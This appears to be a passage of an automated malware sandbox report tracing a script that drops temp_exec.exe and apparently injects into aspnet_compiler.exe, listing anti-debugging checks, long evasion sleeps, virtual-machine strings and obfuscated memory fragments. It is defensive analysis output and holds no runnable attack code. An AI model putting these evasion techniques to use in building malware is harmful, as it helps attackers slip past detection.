Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0132225F pushad ; ret	4_2_013227F9

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory allocated: 14E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory allocated: 4EB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_0139096E rdtsc

4_2_0139096E

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599632	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Window / User API: threadDelayed 501			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Window / User API: threadDelayed 2165			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

API coverage: 0.6 %

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 5464	Thread sleep count: 501 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 5464	Thread sleep count: 2165 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 4408	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 6516	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 6008	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 4160	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599632	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000003.2035708401.000001FB0873A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8giMtQHs&&&Me6MXGv/FhzvMci8VC
Source: wscript.exe, 00000000.00000003.2037193937.000001FB08201000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Me6MXGv/FhzvMci8VCBpd4nvdRIgCmIjrk1jRo0qXpoIjS8zMxtKYjY/txGIY7i01/bQy5gbf0Za1+rBc10yDu/t'/m
Source: wscript.exe, 00000000.00000003.2031821832.000001FB08201000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sahFj...I&&&tQcxP43eg&&&z+xN4PUZWcrfcO09lCoAiSzcXYA3fH29A...giMtQHs&&&Me6MXGv/FhzvMci8lNIQ
Source: wscript.exe, 00000000.00000003.2033980119.000001FB08446000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8giMtQHs&&&Me6MXGv/FhzvMci8VCb#
Source: wscript.exe, 00000000.00000003.2031731504.000001FB0846D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wE;;;xlRcfqybduwb;;;sahFj...I&&&tQcxP43eg&&&z+xN4PUZWcrfcO09lCoAiSzcXYA3fH29A...giMtQHs&&&Me6MXGv/FhzvMci8;;;C...pd4nvdRIgCmIjrk1jRo0qXpoIjS8zMxtKYjY/txGIY7i01/bQy5gbf0Za1+r...c10yDu/&&&qyXQYoud...5z7;;;8umZr8hhljEGnZjymugGOlOyEjcs
Source: wscript.exe, 00000000.00000002.2097335546.000001FB08426000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:wA1m
Source: wscript.exe, 00000000.00000003.2030394488.000001FB08446000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wE;;;xlRcfqybduwb;;;sahFj...I&&&tQcxP43eg&&&z+xN4PUZWcrfcO09lCoAiSzcXYA3fH29A...giMtQHs&&&Me6MXGv/FhzvMci8;;;C...pd4nvdRIgCmIjrk1jRo0qXpoIjS8zMxtKYjY/txGIY7i01/bQy5gbf0Za1+r...c10yDu/&&&qyXQYoud...5z7;;;8umZr8hhljEGnZjymugGOlOyEjcsp7
Source: wscript.exe, 00000000.00000003.2037193937.000001FB08201000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Me6MXGv/FhzvMci8VCBpd4nvdRIgCmIjrk1jRo0qXpoIjS8zMxtKYjY/txGIY7i01/bQy5gbf0Za1+rBc10yDu/C'
Source: wscript.exe, 00000000.00000003.2031259195.000001FB08258000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wE;;;xlRcfqybduwb;;;sahFj...I&&&tQcxP43eg&&&z+xN4PUZWcrfcO09lCoAiSzcXYA3fH29A...giMtQHs&&&Me6MXGv/FhzvMci8;;;C...pd4nvdRIgCmIjrk1jRo0qXpoIjS8zMxtKYjY/txGIY7i01/bQy5gbf0Za1+r...c10yDu/&&&qyXQYoud...5z7;;;8umZr8hhljEGnZjym
Source: wscript.exe, 00000000.00000003.2029322450.000001FB08444000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ...giMtQHs&&&Me6MXGv/FhzvMci8;;;C...pd4nvdRIgCmIjrk1jRo0qXpoIjS8zMxtKYjY/txGIY7i01/bQy5gbf0Za1+r...c10yDu/&&&qyXQYoud...5z7;;;8umZr8hhljEGnZjym))tFY1cjzH&&&1OR4aoGPvCHMCvYWS+
Source: wscript.exe, 00000000.00000003.2032157522.000001FB0845F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sahFj...I&&&tQcxP43eg&&&z+xN4PUZWcrfcO09lCoAiSzcXYA3fH29A...giMtQHs&&&Me6MXGv/FhzvMci8
Source: temp_exec.exe, 00000002.00000002.2092788509.0000000001232000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Code function: 2_2_014E5078 CheckRemoteDebuggerPresent,

2_2_014E5078

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_0139096E rdtsc

4_2_0139096E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_00417063 LdrLoadDll,

4_2_00417063

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01380124 mov eax, dword ptr fs:[00000030h]	4_2_01380124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FA118 mov ecx, dword ptr fs:[00000030h]	4_2_013FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]	4_2_013FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]	4_2_013FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]	4_2_013FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01410115 mov eax, dword ptr fs:[00000030h]	4_2_01410115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]	4_2_01356154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]	4_2_01356154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134C156 mov eax, dword ptr fs:[00000030h]	4_2_0134C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E8158 mov eax, dword ptr fs:[00000030h]	4_2_013E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]	4_2_013E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]	4_2_013E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E4144 mov ecx, dword ptr fs:[00000030h]	4_2_013E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]	4_2_013E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]	4_2_013E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]	4_2_014161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]	4_2_014161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]	4_2_013D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]	4_2_013D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]	4_2_013D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]	4_2_013D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]	4_2_0134A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]	4_2_0134A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]	4_2_0134A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014261E5 mov eax, dword ptr fs:[00000030h]	4_2_014261E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01390185 mov eax, dword ptr fs:[00000030h]	4_2_01390185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013801F8 mov eax, dword ptr fs:[00000030h]	4_2_013801F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]	4_2_0140C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]	4_2_0140C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]	4_2_013CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]	4_2_013CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE1D0 mov ecx, dword ptr fs:[00000030h]	4_2_013CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]	4_2_013CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]	4_2_013CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E6030 mov eax, dword ptr fs:[00000030h]	4_2_013E6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134A020 mov eax, dword ptr fs:[00000030h]	4_2_0134A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134C020 mov eax, dword ptr fs:[00000030h]	4_2_0134C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]	4_2_0136E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]	4_2_0136E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]	4_2_0136E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]	4_2_0136E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D4000 mov ecx, dword ptr fs:[00000030h]	4_2_013D4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137C073 mov eax, dword ptr fs:[00000030h]	4_2_0137C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01352050 mov eax, dword ptr fs:[00000030h]	4_2_01352050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6050 mov eax, dword ptr fs:[00000030h]	4_2_013D6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E80A8 mov eax, dword ptr fs:[00000030h]	4_2_013E80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135208A mov eax, dword ptr fs:[00000030h]	4_2_0135208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134C0F0 mov eax, dword ptr fs:[00000030h]	4_2_0134C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013920F0 mov ecx, dword ptr fs:[00000030h]	4_2_013920F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134A0E3 mov ecx, dword ptr fs:[00000030h]	4_2_0134A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013580E9 mov eax, dword ptr fs:[00000030h]	4_2_013580E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D60E0 mov eax, dword ptr fs:[00000030h]	4_2_013D60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D20DE mov eax, dword ptr fs:[00000030h]	4_2_013D20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014160B8 mov eax, dword ptr fs:[00000030h]	4_2_014160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014160B8 mov ecx, dword ptr fs:[00000030h]	4_2_014160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141A352 mov eax, dword ptr fs:[00000030h]	4_2_0141A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134C310 mov ecx, dword ptr fs:[00000030h]	4_2_0134C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01370310 mov ecx, dword ptr fs:[00000030h]	4_2_01370310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]	4_2_0138A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]	4_2_0138A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]	4_2_0138A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013F437C mov eax, dword ptr fs:[00000030h]	4_2_013F437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]	4_2_013D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]	4_2_013D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]	4_2_013D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D035C mov ecx, dword ptr fs:[00000030h]	4_2_013D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]	4_2_013D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]	4_2_013D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
